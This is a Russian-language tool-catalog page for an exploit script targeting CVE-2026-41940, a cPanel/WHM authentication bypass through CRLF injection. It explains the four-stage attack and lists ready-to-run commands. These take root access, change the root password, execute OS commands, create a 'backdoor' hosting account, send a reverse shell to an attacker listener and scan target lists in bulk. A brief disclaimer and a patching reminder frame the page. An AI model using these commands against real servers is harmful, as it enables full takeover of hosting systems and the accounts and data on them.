Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41940 — cPanel/WHM Authentication Bypass (Уязвимость нулевого дня) | Kitploit
Инструменты/GitHubGitHub/christian93111/cve-2026-41940
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеАутентификацияОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки
GitHubchristian93111/cve-2026-41940

CVE-2026-41940

cPanel/WHM Authentication Bypass (Уязвимость нулевого дня)

10294 месяцев назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-41940: Обход аутентификации cPanel/WHM (одиночная и множественная цель)

Отказ от ответственности: Этот документ и связанный с ним скрипт (exploit.py) предоставлены исключительно в образовательных целях, для исследований в области безопасности и авторизованного тестирования на проникновение. Не используйте это программное обеспечение против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.

Обзор

exploit.py — это скрипт, демонстрирующий уязвимость обхода аутентификации (CVE-2026-41940) в cPanel & WHM. Уязвимость позволяет неаутентифицированному злоумышленнику внедрить корневую сессию в кеш демона через инъекцию CRLF, что в итоге даёт доступ к WHM с правами root без необходимости в действительных учётных данных.

Анализ уязвимости и поток эксплойта

Эксплойт работает за счёт использования уязвимости инъекции CRLF (Carriage Return Line Feed) в механизме обработки базовой аутентификации, в сочетании с ошибкой распространения сессии. Скрипт автоматизирует атаку в четыре этапа:

  1. Создание сессии до аутентификации: Подключается к общедоступным конечным точкам входа (например, /login/ или /cgi/login.cgi) для получения базовой неаутентифицированной сессионной cookie (whostmgrsession).
  2. Инъекция CRLF: Отправляет поддельный заголовок Basic Authentication, содержащий полезную нагрузку в кодировке Base64, которая внедряет поля корневой сессии непосредственно в кеш сессий cpsrvd. Ответ сервера с перенаправлением раскрывает сгенерированный токен безопасности (cpsess).
  3. Распространение сессии: Сырая cookie сессии отправляется на аутентифицированную конечную точку WHM, что запускает do_token_denied для распространения поддельной сессии в кеш демона, делая её действительной аутентифицированной сессией.
  4. Проверка: Обращается к ограниченным конечным точкам WHM API (например, /json-api/version) с использованием поддельной сессии для подтверждения доступа уровня root.

Предварительные требования

  • Python 3.x
  • библиотека requests
pip install requests

Использование

python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

Аргументы

Выбор цели

АргументОписание
--target URLОдиночный URL WHM (например, https://target:2087)
--target-file FILEФайл с целями (по одному ip:port на строку) — автоматически включает режим проверки

Сетевые и основные параметры

АргументОписание
--threads NКоличество одновременных потоков для режима множественных целей (по умолчанию: 10)
--hostname HOSTПереопределение заголовка Host — используйте, когда автоматическое обнаружение не удаётся или выдаёт неверное имя хоста
--timeout NТаймаут на запрос в секундах (по умолчанию: 15)
--retries NКоличество повторных попыток при сетевых ошибках (по умолчанию: 3)
--cookie-name NAMEПринудительно задать имя cookie сессии (автоматически определяется, если опущено)
--no-verifyПропустить проверку этапа 4 и продолжить в любом случае

Параметры эксплуатации (после обхода)

АргументОписание
--checkРежим только проверки — проверка уязвимости без эксплуатации (автоматически устанавливается с --target-file)
--password PASSИзменить пароль root на PASS
--api FUNCВызов определённой функции WHM JSON-API
--api-params K=V,...Параметры через запятую для --api
--exec CMDВыполнение команды ОС через WHM scripts/run_script (запасной вариант: rawexec)
--sessionСоздать URL для входа root в один клик — откройте немедленно, токен быстро истекает
--shellЗапуск интерактивной оболочки WHM (только для одной цели)
--dumpВыгрузить информацию о сервере: версия, учетные записи, DNS-зоны, привилегии
--add-user USER PASS DOMAINСоздать новую хостинговую учетную запись cPanel
--revshell LHOST LPORTОтправить обратный bash shell вашему слушателю

Параметры вывода

АргументОписание
--output FILEСохранить токен сессии и детали в JSON-файл

Примеры

# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

Команды интерактивной оболочки

При использовании --shell доступны следующие команды:

КомандаОписание
api <function> [k=v ...]Вызов функции WHM JSON-API (например, api version)
exec <command>Выполнение команды ОС через WHM (например, exec id)
passwd <newpass>Изменить пароль root
dumpВыгрузить информацию о сервере
revshell <lhost> <lport>Отправить обратный shell
add <user> <pass> <domain>Создать учетную запись cPanel
save <path>Сохранить текущую сессию в файл
exit / quitВыйти из оболочки

Напоминание

Немедленно установите последние патчи безопасности cPanel/WHM.

Скачать инструмент